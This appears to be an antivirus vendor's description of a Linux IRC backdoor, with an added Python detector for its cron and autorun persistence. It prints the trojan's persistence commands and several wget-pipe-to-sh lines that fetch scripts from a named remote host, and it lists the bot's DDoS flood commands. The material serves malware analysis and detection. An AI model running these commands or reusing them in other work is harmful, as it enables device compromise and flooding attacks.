Linux.BackDoor.Tsunami.144

Added to the Dr.Web virus database: 2015-07-16

Virus description added:

SHA1:

  • e8a8d48e1083e7146d5efcba1d6490f05cd8c897 (unpacked)
  • 577551c6a550c3fd30169fb4c2a62fa8b6e73686 (packed)

A backdoor for Linux that is installed on the system by Linux.PNScan.1. Once launched, the Trojan attempts to ensure that it is started automatically by running the following commands:

system("echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &");
system("rm -rf /var/run/wgs* > /dev/null 2>&1 &");
system("rm -rf /var/run/bbs* > /dev/null 2>&1 &");
system("rm -rf /var/run/tty* > /dev/null 2>&1 &");
system("ulimit -s unlimited > /dev/null 2>&1 &");
system("mount -t ext2 /dev/mtdblock4 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/mtdblock5 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdx6 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdc6 /tmp/config > /dev/null 2>&1");
system("rm -rf /var/run/getty1 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty2 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty3 > /dev/null 2>&1 &");
system("cat /tmp/config/autorun.sh | grep -v \"nameserver 8.8.8.8\" | grep -v \"sleep 43200\" | grep -v \"erpcit\" | grep -v \"o.kei\" > /var/run/.backup");
system("echo \"echo \"nameserver 8.8.8.8\" > /etc/resolv.conf\"  >> /var/run/.backup");
system("echo \"sleep 120 && wget -qO - http://*.***.su/qn | sh > /dev/null 2>&1 &\" >> /var/run/.backup");
system("cat /var/run/.backup > /tmp/config/autorun.sh");
system("chmod +x /tmp/config/autorun.sh");
system("umount /tmp/config");
system("rm -rf /var/run/.backup");
system("cat /etc/config/crontab | grep -v \"gettychk\" > /tmp/.fuckw");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckw");
system("cat /tmp/.fuckw > /etc/config/crontab");
system("crontab -l | grep -v \"gettychk\" > /var/run/.fuckx");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckx");
system("echo \"#!/bin/sh\" > /var/run/gettychk");
system("echo \"pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \" >> /var/run/gettychk");
system("chmod 700 /var/run/gettychk");
system("crontab /var/run/.fuckx");
system("crontab /etc/config/crontab");
system("rm -rf /var/run/.fuckw");
system("rm -rf /var/run/.fuckx");
system("/etc/init.d/crond.sh restart > /dev/null 2>&1 &");
system("wget -qO - http://*.***.su/botkill | sh > /dev/null 2>&1 &");

To connect to the IRC server, the Trojan generates the name and alias string as follows:

x32|Linux|root|%c%c%c%c%c%c%c%c%c

where each %c is a random digit from the "0123456789" set. If the backdoor does not have root privileges, the value "unk" is used in place of "root".
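The following is an added detection helper, not code from the Dr.Web description: it checks crontab and shell-script text for the persistence strings listed above (the /var/run/gettychk cron watchdog, the relaunched /var/run/getty0 binary, the resolv.conf overwrite and the wget-pipe-to-sh downloader) and matches the generated IRC nick pattern. The sample crontab, autorun.sh and gettychk contents are constructed, and the host example-c2.invalid is a placeholder because the page redacts the real download host.

```python
import re

# Constructed sample artifacts modelled on the persistence commands quoted
# above; the C2 host is a placeholder because the page redacts it.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /var/run/gettychk > /dev/null 2>&1
"""
SAMPLE_AUTORUN = """\
#!/bin/sh
echo "nameserver 8.8.8.8" > /etc/resolv.conf
sleep 120 && wget -qO - http://example-c2.invalid/qn | sh > /dev/null 2>&1 &
"""
SAMPLE_GETTYCHK = """\
#!/bin/sh
pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 )
"""

# Strings the description attributes to this backdoor's persistence.
HOST_MARKERS = (
    re.compile(r"/var/run/gettychk"),                    # cron watchdog script
    re.compile(r"/var/run/getty0|/var/run/getty\.pid"),  # relaunched binary
    re.compile(r'echo "nameserver 8\.8\.8\.8" > /etc/resolv\.conf'),
    re.compile(r"wget -qO - http://\S+/(qn|botkill|custom|patch) \| sh"),
)
# IRC nick/user string: x32|Linux|root|<nine digits>, or "unk" when not root.
NICK_RE = re.compile(r"^x32\|Linux\|(root|unk)\|[0-9]{9}$")


def suspicious_lines(text):
    """Return the lines of a crontab or shell script that carry a marker."""
    return [line for line in text.splitlines()
            if any(m.search(line) for m in HOST_MARKERS)]


def is_tsunami_nick(nick):
    """True if an IRC NICK value matches the pattern the backdoor generates."""
    return NICK_RE.match(nick) is not None


if __name__ == "__main__":
    samples = (("crontab", SAMPLE_CRONTAB), ("autorun.sh", SAMPLE_AUTORUN),
               ("gettychk", SAMPLE_GETTYCHK))
    for name, text in samples:
        for line in suspicious_lines(text):
            print(f"{name}: {line}")
    print(is_tsunami_nick("x32|Linux|root|123456789"))
```

On a live host the same functions can be fed the output of `crontab -l`, the contents of /etc/config/crontab and the autorun.sh on the mounted config partition.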

Once connected to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

  • 352: Set a fake IP
  • 433: Generate a new nickname
  • ERROR: Generate a new nickname
  • NICK: Take a string from the command as a nickname
  • PING: Send PONG
  • 376: Join the channel. Sends: Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass);
  • 422: Join the channel. Sends: Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass);
  • PRIVMSG: Execute a special command

Moreover, the Trojan can execute a number of extended commands.

  • RANDOMFLOOD: Randomly switch between ACK and SYN flood. Syntax: RANDOMFLOOD <target> <port> <secs>
  • ACKFLOOD: ACK flood (spoofed). Syntax: ACKFLOOD <target> <port> <secs>
  • SYNFLOOD: SYN flood (spoofed). Syntax: SYNFLOOD <target> <port> <secs>
  • TSUNAMI: Launch a DDoS attack. Syntax: TSUNAMI <target> <secs>
  • PAN: "Advanced" SYN flood. Syntax: PAN <target> <port> <secs>
  • SUDP: UDP flood (spoofed). Syntax: SUDP <target> <port> <secs>
  • UDP: UDP flood. Syntax: UDP <target> <port> <secs>
  • NSACKFLOOD: ACK flood. Syntax: NSACKFLOOD <target> <port> <secs>
  • NSSYNFLOOD: SYN flood. Syntax: NSSYNFLOOD <target> <port> <secs>
  • STD: Launch a DDoS attack. Syntax: STD <target> <port> <secs>
  • UNKNOWN: Launch a DDoS attack. Syntax: UNKNOWN <target> <secs> (recommended for non-root users)
  • KILLALL: Terminate a DDoS attack
  • DNS: Resolve a domain name and send its IP to the server
  • CUSTOM: Execute a custom script (from the specified link). Command executed: wget -qO - http://o.kei.su/custom | sh > /dev/null 2>&1
  • PATCH: Apply a patch against the Shellshock vulnerability. Command executed: wget -qO - http://o.kei.su/patch | sh > /dev/null 2>&1
  • BOTKILL: Remove other Trojans. Command executed: wget -qO - http://o.kei.su/botkill | sh > /dev/null 2>&1
  • GETSPOOFS: Get spoofing parameters
  • SPOOFS: Set an IP or an IP range for spoofing. Syntax: SPOOFS <iprange/ip>
  • VERSION: Return the backdoor's version
  • SERVER: Change the server to the one specified in the command
  • GET: Download a specified file. Syntax: GET <url> <save as>
  • IRC: Send the specified IRC commands to the server. Syntax: IRC <arg1> <arg2> <arg...>
  • HELP: Display the list of available commands
  • SH: Execute a set of shell commands. Syntax: SH <arg1> <arg2> <arg...>

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
